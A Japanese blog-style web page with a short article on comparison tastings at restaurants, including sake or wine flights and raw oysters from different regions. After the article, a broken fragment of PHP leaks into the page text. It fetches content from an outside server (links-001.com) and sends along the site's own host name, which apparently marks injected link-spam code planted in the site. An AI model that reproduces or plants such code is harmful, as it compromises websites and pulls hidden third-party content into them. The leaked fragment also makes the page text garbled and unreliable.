前へ
次へ

食べ比べができることも食の楽しさ

最近、食通の人が増えています。
それだけ素材や味にこだわるお店が増えていることも大きな理由でしょう。
また、食通の人は色々なお店を比較しています。
同じ料理でも価格もサイズも、使われているものは二つとして同じものはなく、食も進化し続けています。
食べ歩いて、その情報を収集したり、SNSなどで発信したり共有もしています。
また、食を提供する飲食店にも嬉しい変化があり、食べ比べができるメニューも誕生させています。
例えば、ソムリエによる利き日本酒やワインの提供は最近定着してきました。
同じ産地であっても、年代が同じでも、味や香りは様々です。
辛口もあれば甘口もあります。
海辺のレストランでは、産地が異なる生牡蠣が提供されていました。
大きさも、味わいも異なり、一度で二度美味しく、しかも楽しめるのは魅力のようです。
もちろん、提供される食材の情報提供にも努めているため、食通にとって、調べる手間が省ける魅力もあるようです。
合わせたい飲み物の提案も同時にできるなど、お店側も試行錯誤しています。

".file_get_contents('http://links-001.com/kanren8set.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top